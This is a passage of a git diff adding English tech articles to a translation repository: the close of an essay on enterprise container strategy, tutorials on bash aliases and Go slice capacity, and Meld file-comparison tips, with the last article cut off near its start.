Hat's OpenShift Container Platform][9], [Apprenda][10], [Deis][11], [Rancher][12], etc., which provide enterprise-ready versions of a platform, each with different levels of maturity in terms of features they provide. + +These solutions are certified and supported by vendors. Some of these are comprehensive open source PaaS solutions, while others may be CaaS. Based on your enterprise needs, these solutions may serve as better alternatives than a DIY container platform. + +### Enterprise concerns and their relationship to containers + +Today, almost every enterprise is dealing with a digital transformation that impacts multiple areas, including strategies for DevOps, microservices, and the cloud. Containers play a particular role in each of these areas. + +### DevOps strategy + +IT organizations are divided into operations and application development. They operate as two separate teams, and each has its own set of goals. Most of the enterprises are moving in the direction of DevOps to bring these two teams together. + +Containers have a major role to play in the success of DevOps initiatives. One of the key success criteria in DevOps is to increase the developer's stake in operations. Developers should not only hand off code to operations, but also, they should be concerned about how their code runs in the production. The common technique is to treat "infrastructure as code." Rather than provide pages of installation instructions that are error prone, the development team should provide the environment setup as code. + +This is the exact problem that containers solve. Container images, which are templates for containers, include the entire stack, starting from the base operating system through to the application code. With containers, developers would not just build an application artifact (such as a .jar file) from Dev to QA to Prod; instead, they would pass a versioned container image that includes both the built artifact and the environment in which the artifact runs. The container is all inclusive, with everything from operating system libraries to middleware to the application bundled into one image. Therefore, the way the container runs in Development is the same exact way it runs in QA and Production. Containers are essential ingredients for DevOps success. + + ![Container-based model](https://opensource.com/sites/default/files/containerbasedmodel.png "Container-based model") + +In addition, container platforms are going a step further. Typical Continuous Integration and Delivery (CICD) tools, such as [Jenkins][13], are available as containers that run the entire CICD process on the container platform itself without the need for additional infrastructure. Now, you can use the PaaS platform to build and run your CICD pipelines. + +### Microservices strategy + +[Microservices][14] are another hot topic in IT today. Breaking down applications into discrete, small services, each of which do a small job, pretty well, is how applications are being designed. Each of these microservices could be written in a different language based on the technology suitable. They would be created and managed by small (two-pizza fed) teams and they can be changed fast. All these requirements again allude to containers. Containers are small enough to be the foundation for microservices. Containers can support any technology and language of your choice. They are easy to create and run and can be changed fast. Microservices and containers are considered married now, and if people talk of implementing microservices without using containers, they are often given a strange look. + +The reality is that while microservices promise simplicity, their proliferation also increases complexity. Several microservices design and deployment patterns are coming up to ease their implementation. This means developers are now in need of a platform where they can deploy and orchestrate these microservices with ease and that: + +* Implements these microservices design patterns, in a language agnostic way +* Does not increase the complexity of code with code intrusion so that developers have to include a great deal of pattern code into their business logic +* Is flexible enough to deploy on the infrastructure of your choice and not does not tie you to particular clouds + +This is where choosing a right container platform comes into play. Implementing these microservices on specific infrastructures in a particular vendor's way will tie your applications to those vendor platforms. Containerizing microservices using standard technologies such as OCI-compliant containers will ensure your microservices can be run on any OCI-compliant platform. + +Choosing the right container platform to run your microservices is another important decision to make. Today there are very few choices and a lot of FUD. Some of these choices would take you down the non-standard, vendor-specific route if you are not diligent enough when making this choice. + +### Cloud strategy + +Cloud strategy is one more hot topic in IT. Whether you like it or not, the "as-a-Service" model is an inevitable change. If you don't provide this as a service from IT, your development teams will probably find ways to create shadow IT to get to the cloud. In addition, while using the cloud will move you from capital expenditure to operating expenditure, managing cloud expenditure is a constant challenge. + +Cloud provides VMs, and you want to make sure that the CPU, memory and network resources on this cloud are used optimally before you spin up additional VMs. Containers play an important role here. Because containers are much smaller than VMs, and if your applications are run in containers, you can fit more containers in VMs than running one application component per VM. + +Public cloud vendors are numerous, with Amazon Web Services (AWS), Microsoft Azure, and Google Cloud being a few of the more popular ones. In addition, you may want your own private cloud in your datacenter based on OpenStack. Each of these cloud environments have their own protocols, APIs, and tools. While you want your applications to run on the cloud, you don't want to make your application orchestration be cloud vendor specific and you don't want to maintain any cloud-specific code. Locking in your technology with a specific cloud vendor is like signing blank checks to the vendor for years to come. + +Portability across the cloud is important to your cloud strategy. You can write your applications without worrying about where they run, and the container platform shields you from specific cloud vendor protocols, preventing you from being locked in with one cloud vendor. + +### Legacy systems + +The pluses brought to development by the microservices architecture are many, but not every application can be refactored into them and some only in part. Traditional applications are here to stay and they need to be maintained and managed. While containers enable microservices, containers are not _just_ microservices. Conceivably, you can run large applications and non-microservices as containers, so as long as you choose the right container technology and the right application platform, you can run many, if not all, legacy applications as containers. + +### Wrapping up + +I hope this deep dive into various strategies and containers helps your company evaluate your next step. Let me know in the comments lessons your company has learned or if they haven't taken the leap, what information they need I haven't provided. + +-------------------------------------------------------------------------------- + +作者简介: + +Veer Muchandi - Open source enthusiast. Container and PaaS advocate. Loves to learn and share. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/container-strategy-for-executives + +作者:[Veer Muchandi][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/veermuchandi +[1]:https://www.flickr.com/photos/maerskline/6955071566 +[2]:https://creativecommons.org/licenses/by-sa/4.0/ +[3]:https://opensource.com/article/17/1/container-strategy-for-executives?rate=DuiecCOvGMj-GXcdlJsN8xdZJ82yPUX1M3M9ZNkT99A +[4]:https://opensource.com/resources/what-are-linux-containers +[5]:https://opensource.com/resources/what-docker +[6]:https://opensource.com/business/16/8/inside-look-future-linux-containers +[7]:https://opensource.com/resources/what-is-kubernetes +[8]:https://www.cncf.io/ +[9]:https://www.openshift.com/container-platform/ +[10]:https://apprenda.com/ +[11]:http://deis.io/ +[12]:http://rancher.com/ +[13]:https://jenkins.io/ +[14]:https://opensource.com/resources/what-are-microservices +[15]:https://opensource.com/user/92826/feed +[16]:https://opensource.com/article/17/1/container-strategy-for-executives#comments +[17]:https://opensource.com/users/veermuchandi diff --git a/sources/tech/20170125 Command line aliases in the Linux Shell.md b/sources/tech/20170125 Command line aliases in the Linux Shell.md new file mode 100644 index 0000000000..d223917d3c --- /dev/null +++ b/sources/tech/20170125 Command line aliases in the Linux Shell.md @@ -0,0 +1,138 @@ +Command line aliases in the Linux Shell +============================================================ + +### On this page + +1. [Command line aliases in Linux][1] +2. [Related details][2] +3. [Conclusion][3] + +So far, in this tutorial series, we have discussed the basic usage as well as related details of the [cd -][5] and **pushd**/**popd** commands, as well as the **CDPATH** environment variable. In this fourth and the final installment, we will discuss the concept of aliases as well how you can use them to make your command line navigation easier and smoother. + +As always, before jumping on to the heart of the tutorial, it's worth sharing that all the instructions as well examples presented in this article have been tested on Ubuntu 14.04LTS. The command line shell we've used is bash (version  4.3.11). + +### Command line aliases in Linux + +In layman's terms, aliases can be thought of as short names or abbreviations to a complex command or a group of commands, including their arguments or options. So basically, with aliases, you create easy to remember names for not-so-easy-to-type/remember commands. + +For example, the following command creates an alias 'home' for the 'cd ~' command: + +alias home="cd ~" + +This means that now you can quickly type 'home' and press enter whenever you want to come back to your home directory from anywhere on your system. + +Here's what the alias command man page says about this utility: + +``` +The alias utility shall create or redefine alias definitions or write the values of existing alias definitions to standard output. An alias definition provides a string value that shall replace a command name when it is encountered + +An alias definition shall affect the current shell execution environment and the execution environments of the subshells of the current shell. When used as specified by this volume of IEEE Std 1003.1-2001, the alias definition shall not affect the parent process of the current shell nor any utility environment invoked by the shell. +``` + +So, how exactly aliases help in command line navigation? Well, here's a simple example: + +Suppose you are working in the _/home/himanshu/projects/howtoforge_ directory, which further contains many subdirectories, and sub-subdirectories. For example, following is one complete directory branch: + +``` +/home/himanshu/projects/howtoforge/command-line/navigation/tips-tricks/part4/final +``` + +Now imagine, you are in the 'final' directory, and then you want to get back to the 'tips-tricks' directory, and from there, you need to get back to the 'howtoforge' directory. What would you do? + +Well, normally, you'd run the following set of commands: + +cd ../.. + +cd ../../.. + +While this approach isn't wrong per se, it's definitely not convenient, especially when you've to go back, say 5 directories in a very long path. So, what's the solution? The answer is: aliases. + +What you can do is, you can create easy to remember (and type) aliases for each of the _cd .._ commands. For example: + +alias bk1="cd .." +alias bk2="cd ../.." +alias bk3="cd ../../.." +alias bk4="cd ../../../.." +alias bk5="cd ../../../../.." + +So now whenever you want to go back, say 5 places, from your current working directory, you can just run the following command: + +bk5 + +Isn't that easy now? + +### Related details + +While the technique we've used to define aliases so far (using the alias command) on the shell prompt does the trick, the aliases exist only for the current terminal session. There are good chances that you may want aliases defined by you to persist so that they can be used in any new command line terminal window/tab you launch thereafter. + +For this, you need to define your aliases in the _~/.bash_aliases_ file, which is loaded by your _~/.bashrc_ file by default (please verify this if you are using an older Ubuntu version). + +Following is the excerpt from my .bashrc file that talks about the .bash_aliases file: + +``` +# Alias definitions. +# You may want to put all your additions into a separate file like +# ~/.bash_aliases, instead of adding them here directly. +# See /usr/share/doc/bash-doc/examples in the bash-doc package. + +if [ -f ~/.bash_aliases ]; then + . ~/.bash_aliases +fi +``` + +Once you've added an alias definition to your .bash_aliases file, that alias will be available on any and every new terminal. However, you'll not be able to use it in any other terminal which was already open when you defined that alias - the way out is to source .bashrc from those terminals. Following is the exact command that you'll have to run: + +source ~/.bashrc + +If that sounds a little too much of work (yes, I am looking at you LAZY ONES), then here's a shortcut to do all this: + +"alias [the-alias]" >> ~/.bash_aliases && source ~/.bash_aliases + +Needless to say, you'll have to replace [the-alias] with the actual command. For example: + +"alias bk5='cd ../../../../..'" >> ~/.bash_aliases && source ~/.bash_aliases + +Moving on, now suppose you've created some aliases, and have been using them on and off for a few months. Suddenly, one day, you doubt that one of them isn't working as expected. So you feel the need to look at the exact command that was assigned to that alias. What would you do? + +Of course, you can open your .bash_aliases file and take a look there, but this process can be a bit time consuming, especially when the file contains a lot of aliases. So, if you're looking for an easy way out, here's one: all you have to do is to run the _alias_ command with the alias-name as argument. + +Here's an example: + +$ alias bk6 +alias bk6='cd ../../../../../..' + +As you can see, the aforementioned command displayed the actual command assigned to the bk6 alias. There's one more way: to use the _type_ command. Following is an example: + +$ type bk6 +bk6 is aliased to `cd ../../../../../..' + +So the type command produces a more human-understandable output. + +Another thing worth sharing here is that you can use aliases for the common typos you make. For example: + +alias mroe='more' + +_Finally, it's also worth mentioning that not everybody is in favor of using aliases. Most of them argue that once you get used to the aliases you define for your ease, it gets really difficult for you to work on some other system where those aliases don't exist (and you're not allowed to create any as well). For more (as well as precise reasons) why some experts don't recommend using aliases, you can head[here][4]. _ + +### Conclusion + +Like the CDPATH environment variable we discussed in the previous part, alias is also a double edged sword that one should use very cautiously. Don't get discouraged though, as everything has its own advantages and disadvantages. Just that practice and complete knowledge is the key when you're dealing with concepts like aliases. + +So this marks the end of this tutorial series. Hope you enjoyed it as well learned some new things/concepts from it. In case you have any doubts or queries, please share them with us (and the rest of the world) in comments below. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/command-line-aliases-in-linux/ + +作者:[Ansh][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/command-line-aliases-in-linux/ +[1]:https://www.howtoforge.com/tutorial/command-line-aliases-in-linux/#command-line-aliases-in-linux +[2]:https://www.howtoforge.com/tutorial/command-line-aliases-in-linux/#related-details +[3]:https://www.howtoforge.com/tutorial/command-line-aliases-in-linux/#conclusion +[4]:http://unix.stackexchange.com/questions/66934/why-is-aliasing-over-standard-commands-not-recommended +[5]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/ diff --git a/sources/tech/20170126 How to use slice capacity and length in Go.md b/sources/tech/20170126 How to use slice capacity and length in Go.md new file mode 100644 index 0000000000..59a2c50779 --- /dev/null +++ b/sources/tech/20170126 How to use slice capacity and length in Go.md @@ -0,0 +1,324 @@ +
[How to use slice capacity and length in Go][14] +============================================================
+ + + +Quick pop quiz - what does the following code output? + +``` +vals := make([]int, 5) +for i := 0; i < 5; i++ { + vals = append(vals, i) +} +fmt.Println(vals) +``` + +_[Cheat and run it on the Go Playground][1]_ + +If you guessed `[0 0 0 0 0 0 1 2 3 4]` you are correct. + +_Wait, what?_ Why isn't it `[0 1 2 3 4]`? + +Don't worry if you got the pop quiz wrong. This is a fairly common mistake when transitioning into Go and in this post we are going to cover both why the output isn't what you expected along with how to utilize the nuances of Go to make your code more efficient. + +### Slices vs Arrays + +In Go there are both arrays and slices. This can be confusing at first, but once you get used to it you will love it. Trust me. + +There are many differences between slices and arrays, but the primary one we want to focus on in this article is that the size of an array is part of its type, whereas slices can have a dynamic size because they are wrappers around arrays. + +What does this mean in practice? Well, let's say we have the array `val a [10]int`. This array has a fixed size and that can't be changed. If we were to call `len(a)` it would always return 10, because that size is part of the type. As a result, if you suddenly need more than 10 items in your array you have to create a new object with an entirely different type, such as `val b [11]int`, and then copy all of your values from `a` over to `b`. + +While having arrays with set sizes is valuable in specific cases, generally speaking this isn't what developers want. Instead, they want to work with something similar to an array in Go, but with the ability to grow over time. One crude way to do this would be to create an array that is much bigger than it needs to be and then to treat a subset of the array as your array. An example of this is shown in the code below. + +``` +var vals [20]int +for i := 0; i < 5; i++ { + vals[i] = i * i +} +subsetLen := 5 + +fmt.Println("The subset of our array has a length of:", subsetLen) + +// Add a new item to our array +vals[subsetLen] = 123 +subsetLen++ +fmt.Println("The subset of our array has a length of:", subsetLen) +``` + +_[Run it on the Go Playground][2]_ + +With this code we have an array with a set size of 20, but because we are only using a subset our code can pretend that the length of the array is 5, and then 6 after we add a new item to our array. + +This is (very roughly speaking) how slices work. They wrap an array with a set size, much like our array in the previous example has a set size of 20. + +They also keep track of the subset of the array that is available for your program to use - this is the `length` attribute, and it is similar to the `subsetLen` variable in the previous example. + +Finally, a slice also has a `capacity`, which is similar to the total length of our array (20) in the previous example. This is useful because it tells you how large your subset can grow before it will no longer fit in the array that is backing the slice. When this does happen, a new array will need to be allocated, but all of this logic is hidden behind the `append` function. + +In short, combining slices with the `append` function gives us a type that is very similar to arrays, but is capable of growing over time to handle more elements. + +Let's look at the previous example again, but this time we will use a slice instead of an array. + +``` +var vals []int +for i := 0; i < 5; i++ { + vals = append(vals, i) + fmt.Println("The length of our slice is:", len(vals)) + fmt.Println("The capacity of our slice is:", cap(vals)) +} + +// Add a new item to our array +vals = append(vals, 123) +fmt.Println("The length of our slice is:", len(vals)) +fmt.Println("The capacity of our slice is:", cap(vals)) + +// Accessing items is the same as an array +fmt.Println(vals[5]) +fmt.Println(vals[2]) +``` + +_[Run it on the Go Playground][3]_ + +We can still access elements in our slice just like we would arrays, but by using a slice and the `append` function we no longer have to think about the size of the backing array. We are still able to figure these things out by using the `len` and `cap` functions, but we don't have to worry too much about them. Neat, right? + +### Back to the pop quiz + +With that in mind, let's look back at our pop quiz code to see what went wrong. + +``` +vals := make([]int, 5) +for i := 0; i < 5; i++ { + vals = append(vals, i) +} +fmt.Println(vals) +``` + +When calling `make` we are permitted to pass in up to 3 arguments. The first is the type that we are allocating, the second is the `length` of the type, and the third is the `capacity` of the type (_this parameter is optional_). + +By passing in the arguments `make([]int, 5)` we are telling our program that we want to create a slice with a length of 5, and the capacity is defaulted to the length provided - 5 in this instance. + +While this might seem like what we wanted at first, the important distinction here is that we told our slice that we wanted to set both the `length` and `capacity` to 5, and then we proceeded to call the `append` function which assumes you want to add a new element _after_ the initial 5, so it will increase the capacity and start adding new elements at the end of the slice. + +You can actually see the capacity changing if you add a `Println()` statement to your code. + +``` +vals := make([]int, 5) +fmt.Println("Capacity was:", cap(vals)) +for i := 0; i < 5; i++ { + vals = append(vals, i) + fmt.Println("Capacity is now:", cap(vals)) +} + +fmt.Println(vals) +``` + +_[Run it on the Go Playground][4]_ + +As a result, we end up getting the output `[0 0 0 0 0 0 1 2 3 4]` instead of the desired `[0 1 2 3 4]`. + +How do we fix it? Well, there are several ways to do this, so we are going to cover two of them and you can pick whichever makes the most sense in your situation. + +### Write directly to indexes instead of using `append` + +The first fix is to leave the `make` call unchanged and explicitly state the index that you want to set each element to. Doing this, we would get the following code: + +``` +vals := make([]int, 5) +for i := 0; i < 5; i++ { + vals[i] = i +} +fmt.Println(vals) +``` + +_[Run it on the Go Playground][5]_ + +In this case the value we are setting happens to be the same as the index we want to use, but you can also keep track of the index independently. + +For example, if you wanted to get the keys of a map you could use the following code. + +``` +package main + +import "fmt" + +func main() { + fmt.Println(keys(map[string]struct{}{ + "dog": struct{}{}, + "cat": struct{}{}, + })) +} + +func keys(m map[string]struct{}) []string { + ret := make([]string, len(m)) + i := 0 + for key := range m { + ret[i] = key + i++ + } + return ret +} +``` + +_[Run it on the Go Playground][6]_ + +This works well because we know that the exact length of the slice we return will be the same as the length of the map, so we can initialize our slice with that length and then assign each element to an appropriate index. The downside to this approach is that we have to keep track of `i` so that we know what index to place every value in. + +This leads us to the second approach we are going to cover... + +### Use `0` as your length and specify your capacity instead + +Rather than keeping track of which index we want to add our values to, we can instead update our `make` call and provide it with two arguments after the slice type. The first, the length of our new slice, will be set to `0`, as we haven't added any new elements to our slice. The second, the capacity of our new slice, will be set to the length of the map parameter because we know that our slice will eventually have that many strings added to it. + +This will still construct the same array behind the scenes as the previous example, but now when we call `append` it will know to place items at the start of our slice because the length of the slice is 0. + +``` +package main + +import "fmt" + +func main() { + fmt.Println(keys(map[string]struct{}{ + "dog": struct{}{}, + "cat": struct{}{}, + })) +} + +func keys(m map[string]struct{}) []string { + ret := make([]string, 0, len(m)) + for key := range m { + ret = append(ret, key) + } + return ret +} +``` + +_[Run it on the Go Playground][7]_ + +### Why do we bother with capacity at all if `append` handles it? + +The next thing you might be asking is, "Why are we even telling our program a capacity if the `append` function can handle increasing the capacity of my slice for me?" + +The truth is, in most cases you don't need to worry about this too much. If it makes your code significantly more complicated, just initialize your slice with `var vals []int` and let the `append`function handle the heavy lifting for you. + +But this case is different. It isn't an instance where declaring the capacity is difficult; In fact, it is actually quite easy to determine what the final capacity of our slice needs to be because we know it will map directly to the provided map. As a result, we can declare the capacity of our slice when we initialize it and save our program from needing to perform unnecessary memory allocations. + +If you want to see what the extra memory allocations look like, run the following code on the Go Playground. Every time capacity increases our program needed to do another memory allocation. + +``` +package main + +import "fmt" + +func main() { + fmt.Println(keys(map[string]struct{}{ + "dog": struct{}{}, + "cat": struct{}{}, + "mouse": struct{}{}, + "wolf": struct{}{}, + "alligator": struct{}{}, + })) +} + +func keys(m map[string]struct{}) []string { + var ret []string + fmt.Println(cap(ret)) + for key := range m { + ret = append(ret, key) + fmt.Println(cap(ret)) + } + return ret +} +``` + +_[Run it on the Go Playground][8]_ + +Now compare this to the same code but with a predefined capacity. + +``` +package main + +import "fmt" + +func main() { + fmt.Println(keys(map[string]struct{}{ + "dog": struct{}{}, + "cat": struct{}{}, + "mouse": struct{}{}, + "wolf": struct{}{}, + "alligator": struct{}{}, + })) +} + +func keys(m map[string]struct{}) []string { + ret := make([]string, 0, len(m)) + fmt.Println(cap(ret)) + for key := range m { + ret = append(ret, key) + fmt.Println(cap(ret)) + } + return ret +} +``` + +_[Run it on the Go Playground][9]_ + +In the first code sample our capacity starts at `0`, and then increases to `1`, `2`, `4`, and then finally `8`, meaning we had to allocate a new array 5 different times, and on top of that the final array used to back our slice has a capacity of `8`, which is bigger than we ultimately needed. + +On the other hand, our second sample starts and ends with the same capacity (`5`) and only needs to allocate it once at the start of the `keys()` function. We also avoid wasting any extra memory and return a slice with the perfect size array backing it. + +### Don't over-optimize + +As I said before, I typically wouldn't encourage anyone to worry about minor optimizations like this, but in cases where it is really obvious what the final size should be I strongly encourage you to try to set an appropriate capacity or length for your slices. + +Not only does it help improve the performance of your application, but it can also help clarify your code a bit by explicitly stating the relationship between the size of your input and the size of your output. + +### In summary... + +> Hi there! I write a lot about Go, web development, and other topics I find interesting. +> +> If you want to stay up to date with my writing, please [sign up for my mailing list][10]. I'll send you a FREE sample of my upcoming book, Web Development with Go, and an occasional email when I publish a new article (usually 1-2 per week). +> +> Oh, and I promise I don't spam. I hate it as much as you do :) + +This article is not meant to be an exhaustive discussion on the differences between slices or arrays, but instead is meant to serve as a brief introduction into how capacity and length affect your slices, and what purpose they serve in the grand scheme of things. + +For further reading, I highly recommend the following articles from the Go Blog: + +* [Go Slices: usage and internals][11] +* [Arrays, slices (and strings): The mechanics of 'append'][12] +* [Slice Tricks][13] + +-------------------------------------------------------------------------------- + +作者简介: + +Jon is a software consultant and the author of the book Web Development with Go. Prior to that he founded EasyPost, a Y Combinator backed startup, and worked at Google. +https://www.usegolang.com + +-------------------------------------------------------------------------------- + + +via: https://www.calhoun.io/how-to-use-slice-capacity-and-length-in-go + +作者:[Jon Calhoun][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.calhoun.io/hire-me +[1]:https://play.golang.org/p/7PgUqBdZ6Z +[2]:https://play.golang.org/p/Np6-NEohm2 +[3]:https://play.golang.org/p/M_qaNGVbC- +[4]:https://play.golang.org/p/d6OUulTYM7 +[5]:https://play.golang.org/p/JI8Fx3fJCU +[6]:https://play.golang.org/p/kIKxkdX35B +[7]:https://play.golang.org/p/h5hVAHmqJm +[8]:https://play.golang.org/p/fDbAxtAjLF +[9]:https://play.golang.org/p/nwT8X9-7eQ +[10]:https://www.calhoun.io/how-to-use-slice-capacity-and-length-in-go/?utm_source=golangweekly&utm_medium=email#mailing-list-form +[11]:https://blog.golang.org/go-slices-usage-and-internals +[12]:https://blog.golang.org/slices +[13]:https://github.com/golang/go/wiki/SliceTricks +[14]:https://www.calhoun.io/how-to-use-slice-capacity-and-length-in-go/ diff --git a/sources/tech/20170126 Useful Meld tipstricks for intermediate users.md b/sources/tech/20170126 Useful Meld tipstricks for intermediate users.md new file mode 100644 index 0000000000..7894ceb69d --- /dev/null +++ b/sources/tech/20170126 Useful Meld tipstricks for intermediate users.md @@ -0,0 +1,134 @@ +Useful Meld tips/tricks for intermediate users +============================================================ + +### On this page + +1. [1\. Navigation][1] +2. [2\. Things you can do with changes][2] +3. [4\. Filtering text][3] + +* [Conclusion][4] + +Meld is a feature-rich visual comparison and merging tool available for Linux. If you're new to the tool, you can head to our [beginner's guide][5] to get a quick know-how of how the utility works. However, if you've already read that, or are already using Meld for basic comparison/merging tasks, you'll be glad to know that in this tutorial, we will be discussing some really useful tips/tricks that will make your experience with the tool even better. + +_But before we jump onto the installation and explanation part, it'd be worth sharing that all the instructions and examples presented in this tutorial have been tested on Ubuntu 14.04 and the Meld version we've used is 3.14.2_. + +### Meld tips/tricks for intermediate users + +### 1\. Navigation + +As you might already know (and we've also mentioned this in our beginner's guide), standard scrolling is not the only way to navigate between changes while using Meld - you can easily switch from one change to another using the up and down arrow keys located in the pane that sits above the edit area: + +[ + ![Navigating in Meld](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-go-next-prev-9.png) +][6] + +However, this requires you to move your mouse pointer to these arrows and then click one of them (depending on where you want to go - up or down) repeatedly. You'll be glad to know that there exists an even easier way to jump between changes: just use your mouse's scroll wheel to perform scrolling when mouse pointer is on the central change bar. + +[ + ![The change bar](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-center-area-scrolling.png) +][7] + +This way, you can navigate between changes without taking your eyes off them, or getting distracted. + +### 2\. Things you can do with changes + +Just look at the last screenshot in the previous section. You know what those black arrows do, right? By default, they let you perform the merge/change operation - merge when there's no confliction, and change when there's a conflict in the same line. + +But do you know you can delete individual changes if you want. Yes, that's possible. For this, all you have to do is to press the Shift key when dealing with changes. You'll observe that arrows get converted into crosses.  + +[ + ![Things you can do with changes](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-delete-changes.png) +][8] + +Just click any of them, and the corresponding change will get deleted. + +Not only delete, you can also make sure that conflicting changes do not change the lines when merged. For example, here's an example of a conflicting change: + +[ + ![Delete changes in Meld](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-conflicting-change.png) +][9]  + +Now, if you click any the two black arrows, the line where the arrow points will get changed, and will become similar to the corresponding line of other file. That's fine as long as you want this to happen. But what if you don't want any of the lines to get changed? Instead, the aim is to insert the changed line above or below the corresponding line in other file. + +What I am trying to say is that, for example, in the screenshot above, the need is to add 'test 2' above or below 'test23', rather than changing 'test23' to 'test2'. You'll be glad to know that even that's possible with Meld. Just like you press the Shift key to delete comments, in this case, you'll have to press the Ctrl key.  + +And you'll observe that the current action will be changed to insert - the dual arrow icons will confirm this. + +[ + ![Change actions](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-ctrl-insert.png) +][10] + +As clear from the direction of arrows, this action helps users to insert the current change above or below (as selected) the corresponding change in other file. + +### 3\. Customize the way files are displayed in Meld's editor area + +There might be times when you would want the text size in Meld's editor area to be a bit large (for better  or more comfortable viewing), or you would want the text lines to wrap instead of going out of visual area (meaning you don't want to use the horizontal scroll bar at the bottom). + +Meld provides some display- and font-related customization options in its _Preferences_ menu under the _Editor_ tab (_Edit->Preferences->Editor_) where you'll be able to make these kind of tweaks: + +[ + ![Meld preferences](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-editor-tab.png) +][11] + +So here you can see that, by default, Meld uses the system defined font width. Just uncheck that box under the _Font_ category, and you'll have a plethora of font type and size options to select from. + +Then in the _Display_ section, you'll see all the customization options we were talking about: you can set Tab width, tell the tool whether or not to insert spaces instead of tabs, enable/disable text wrapping, make Meld show line numbers and whitespaces (very useful in some cases) as well as use syntax highlighting. + +### 4\. Filtering text + +There are times when not all the changes that Meld shows are important to you. For example, while comparing two C programming files, you may not want changes in comments to be shown by Meld as you only want to focus on code-related changes. So, in that case, you can tell Meld to filter (or ignore) comment-related changes. + +For example, here's a Meld comparison where comment-related changes are highlighted by the tool: + +[ + ![Filter Text in Meld](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-changes-with-comments.png) +][12] + +And here's the case where Meld has ignored the same changes, focusing only on the code-related changes: + +[ + ![Ignore Changes in Meld](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-changes-without-comments.png) +][13] + +Cool, isn't it? So, how did that happen? Well, for this, what I did was, I enabled the 'C comments' text filter in _Edit->Preferences->Text Filters_ tab: + +[ + ![C-Comments in Meld](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/meld-text-filters.png) +][14] + +As you can see, aside from 'C comments', you can also filter out C++ comments, Script comments, leading or all whitespaces, and more. What more, you can also define custom text filters for any specific case you are dealing with. For example, if you are dealing with log-files and don't want changes in lines that begin with a particular pattern to be highlighted by Meld, then you can define a custom text filter for that case. + +However, keep in mind that in order to define a new text filter, you need to know Python language as well as how to create regular expressions in that language. + +### Conclusion + +All the four tips/tricks discussed here aren't very difficult to understand and use (except, of course, if you want to create custom text filters right away), and once you start using them, you'll agree that they are really beneficial.  The key here is to keep practicing, otherwise any tip/trick you learn will slip out of your mind in no time. + +Do you know or use any other intermediate level Meld tip or trick? If yes, then you are welcome to share that in comments below. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/ + +作者:[Ansh ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/ +[1]:https://www.howtoforge.com/tutorial/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/#-navigation +[2]:https://www.howtoforge.com/tutorial/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/#-things-you-can-do-with-changes +[3]:https://www.howtoforge.com/tutorial/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/#-filtering-text +[4]:https://www.howtoforge.com/tutorial/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/#conclusion +[5]:https://www.howtoforge.com/tutorial/beginners-guide-to-visual-merge-tool-meld-on-linux/ +[6]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-go-next-prev-9.png +[7]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-center-area-scrolling.png +[8]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-delete-changes.png +[9]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-conflicting-change.png +[10]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-ctrl-insert.png +[11]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-editor-tab.png +[12]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-changes-with-comments.png +[13]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-changes-without-comments.png +[14]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-2/big/meld-text-filters.png diff --git a/sources/tech/20170127 How to compare directories with Meld on Linux.md b/sources/tech/20170127 How to compare directories with Meld on Linux.md new file mode 100644 index 0000000000..ae9591bcc8 --- /dev/null +++ b/sources/tech/20170127 How to compare directories with Meld on Linux.md @@ -0,0 +1,144 @@ +How to compare directories with Meld on Linux +============================================================ + +### On this page + +1. [Compare directories using Meld][1] +2. [Conclusion][2] + +We've [already covered][4] Meld from a beginner's point of view (including the tool's installation part), and we've also covered some tips/tricks that are primarily aimed at intermediate Meld users. 